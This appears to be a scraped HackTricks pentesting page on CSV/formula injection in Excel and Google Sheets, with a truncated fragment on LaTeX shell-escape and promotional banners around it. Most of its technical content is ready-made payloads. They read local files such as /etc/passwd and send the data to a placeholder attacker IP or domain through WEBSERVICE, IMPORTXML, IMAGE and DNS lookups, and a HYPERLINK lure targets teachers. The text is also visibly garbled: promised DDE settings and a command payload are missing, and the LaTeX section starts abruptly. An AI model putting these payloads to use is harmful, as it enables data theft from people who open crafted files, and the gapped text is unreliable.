<summary><strong>Learn AWS hacking from zero to hero with</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
If your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.
Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload.
**The following example is very useful to exfiltrate content from the final excel sheet and to perform requests to arbitrary locations. But it requires the use to click on the link (and accept the warning prompts).**
Imagine a security breach in a Student Record Management system is exploited through a CSV injection attack. The attacker's primary intention is to compromise the system used by teachers to manage student details. The method involves the attacker injecting a malicious payload into the application, specifically by entering harmful formulas into fields meant for student details. The attack unfolds as follows:
- The attacker submits a student detail form but includes a formula commonly used in spreadsheets (e.g., `=HYPERLINK("<malicious_link>","Click here")`).
- This formula is designed to create a hyperlink, but it points to a malicious server controlled by the attacker.
- A teacher clicks on the hyperlink, believing it to be a legitimate part of the student's details.
- Upon clicking, sensitive data (potentially including details from the spreadsheet or the teacher's computer) is transmitted to the attacker's server.
- The attacker's server receives and logs the sensitive data sent from the teacher's computer.
- The attacker can then use this data for various malicious purposes, further compromising the privacy and security of the students and the institution.
In specific configurations or older versions of Excel, a feature called Dynamic Data Exchange (DDE) can be exploited for executing arbitrary commands. To leverage this, the following settings must be enabled:
When a spreadsheet with the malicious payload is opened (and if the user accepts the warnings), the payload is executed. For example, to launch the calculator application, the payload would be:
- Reading the first line from the local `/etc/passwd` file: `='file:///etc/passwd'#$passwd.A1`
- Exfiltrating the read data to an attacker-controlled server: `=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))`
- Exfiltrating more than one line: `=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
- DNS exfiltration (sending read data as DNS queries to an attacker-controlled DNS server): `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))`
- **CONCATENATE**: Appends strings together - `=CONCATENATE(A2:E2)`
- **IMPORTXML**: Imports data from structured data types - `=IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")`
- **IMPORTFEED**: Imports RSS or ATOM feeds - `=IMPORTFEED(CONCAT("http://<attacker IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))`
- **IMPORTHTML**: Imports data from HTML tables or lists - `=IMPORTHTML (CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)`
- **IMPORTRANGE**: Imports a range of cells from another spreadsheet - `=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")`
- **IMAGE**: Inserts an image into a cell - `=IMAGE("https://<attacker IP:Port>/images/srpr/logo3w.png")`
* **`--shell-restricted`**: Same as `--shell-escape`, but **limited** to a 'safe' set of **predefined** \*\*commands (\*\*On Ubuntu 16.04 the list is in `/usr/share/texmf/web2c/texmf.cnf`).
* **`--shell-escape`**: **Enable** the `\write18{command}` construct. The command can be any shell command. This construct is normally disallowed for security reasons.
However, there are other ways to execute commands, so to avoid RCE it's very important to use `--shell-restricted`.
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
<summary><strong>Learn AWS hacking from zero to hero with</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.